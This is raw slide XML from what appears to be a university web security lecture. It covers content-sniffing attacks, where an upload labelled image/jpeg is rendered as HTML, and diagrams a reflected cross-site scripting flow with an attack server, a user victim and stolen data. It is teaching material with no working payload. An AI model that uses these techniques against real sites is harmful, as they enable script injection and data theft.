              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      Content-Type:  image/jpeg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      &lt;html&gt;  fooled ya   &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IE will render this as HTML    (despite Content-Type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Consider photo sharing sites that support image uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>What if attacker uploads an “image” that is a script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rounded Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2667000"/>
            <a:ext cx="4724400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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3600" smtClean="0"/>
              <a:t>Lots more information about attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31748" name="Picture 2" descr="http://ec1.images-amazon.com/images/I/51TRAAZC73L._SS500_.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="4762500" cy="4762500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31749" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="5156200"/>
            <a:ext cx="2133600" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strangely, this is not the cover of the book ...</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US" sz="3200" smtClean="0"/>
              <a:t>Complex problems in social network sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1828800"/>
            <a:ext cx="5105400" cy="41148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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 4" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\ZR24IX3M\MCj04348450000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2133600"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Can 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554913" y="1828800"/>
            <a:ext cx="1284287" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="can">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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 9" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\DCKGN2VX\MCj04352420000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6132513" y="4572000"/>
            <a:ext cx="1270000" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="5080000"/>
            <a:ext cx="1436688" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-supplied application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Down Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6819900" y="2552700"/>
            <a:ext cx="3048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9" name="Down Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8578543">
            <a:off x="6375400" y="3756025"/>
            <a:ext cx="304800" cy="69373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0" name="Down Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4686300" y="2933700"/>
            <a:ext cx="3048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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1143000" y="2133600"/>
          <a:ext cx="3144838" cy="2143125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s282636" name="Acrobat Document" r:id="rId6" imgW="2664000" imgH="2131200" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId6" imgW="2664000" imgH="2131200" progId="AcroExch.Document.7">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133600"/>
                        <a:ext cx="3144838"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Down Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4686300" y="3009900"/>
            <a:ext cx="304800" cy="5334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7" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="2933700"/>
            <a:ext cx="1685925" cy="7048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4" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2133600"/>
            <a:ext cx="3143250" cy="215265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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="4038600"/>
            <a:ext cx="3352800" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="32941"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Defenses at server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38917" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38918" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38919" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1524000"/>
            <a:ext cx="16938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Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38920" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552950"/>
            <a:ext cx="1760538"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Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38921" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38922" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1465263" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38923" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2970213" y="1733550"/>
            <a:ext cx="1654175" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38924" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38925" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2508250" y="2270125"/>
            <a:ext cx="2738438" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38926" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38927" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654175" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38928" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="2638425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38929" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="19494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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38930" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="260667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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38931" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="3705225"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38932" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38933" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38934" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2749550"/>
            <a:ext cx="2305050" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38935" name="Oval 38"/>
